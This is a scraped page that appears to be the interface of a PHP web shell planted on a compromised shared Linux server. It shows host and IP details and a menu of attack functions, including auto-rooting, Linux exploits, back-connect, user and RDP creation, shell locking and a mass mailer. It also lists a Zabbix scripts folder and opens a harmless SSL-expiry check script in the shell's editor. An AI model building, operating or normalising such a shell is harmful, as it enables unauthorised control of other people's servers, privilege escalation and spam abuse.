Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
zabbix /
[ HOME SHELL ]
Name
Size
Permission
Action
ceph-osd-stats.py
1.38
KB
-rwxr-xr-x
ceph-status.py
15.58
KB
-rwxr-xr-x
ceph-status.sh
5.69
KB
-rwxr-xr-x
ceph_health_report.py
388
B
-rwxr-xr-x
corosync.pl
774
B
-rwxr-xr-x
corosync_standby.sh
190
B
-rwxr-xr-x
discover_lsi_raid.pl
12.27
KB
-rwxr-xr-x
discover_temp_sensor.pl
1.42
KB
-rwxr-xr-x
haproxy_discovery.sh
1.93
KB
-rwxr-xr-x
haproxy_stats.sh
6.38
KB
-rwxr-xr-x
ip_discovery.sh
429
B
-rwxr-xr-x
kafka_underreplicated.sh
120
B
-rwxr-xr-x
php-fpm.discover_pools.pl
460
B
-rwxr-xr-x
smartctl-disks-discovery.pl
11.78
KB
-rwxr-xr-x
time_discovery.sh
235
B
-rwxr-xr-x
zbx_docker_inspect.sh
232
B
-rwxr-xr-x
zbx_vxfld.py
255
B
-rwxr-xr-x
zbxproxyfind.py
491
B
-rwxr-xr-x
zext_ssl_expiry.sh
546
B
-rwxr-xr-x
zookeeper_check.sh
163
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zext_ssl_expiry.sh
#! /bin/bash SERVER=$1 TIMEOUT=25 RETVAL=0 #TIMESTAMP=`echo | date` if [ -z "$2" ]; then PORT=443; else PORT=$2; fi if [ -z "$3" ]; then SNI=$1 else SNI=$3 fi EXPIRE_DATE=`echo "" | openssl s_client -connect ${SERVER}:${PORT} -servername ${SNI} 2>/dev/null | openssl x509 -noout -dates 2>/dev/null | grep notAfter | cut -d'=' -f2` EXPIRE_SECS=`date -d "${EXPIRE_DATE}" +%s` EXPIRE_TIME=$(( ${EXPIRE_SECS} - `date +%s` )) if [ ${EXPIRE_TIME} -lt 0 ]; then RETVAL=0 else RETVAL=$(( ${EXPIRE_TIME} / 24 / 3600 )) fi echo ${RETVAL}
Close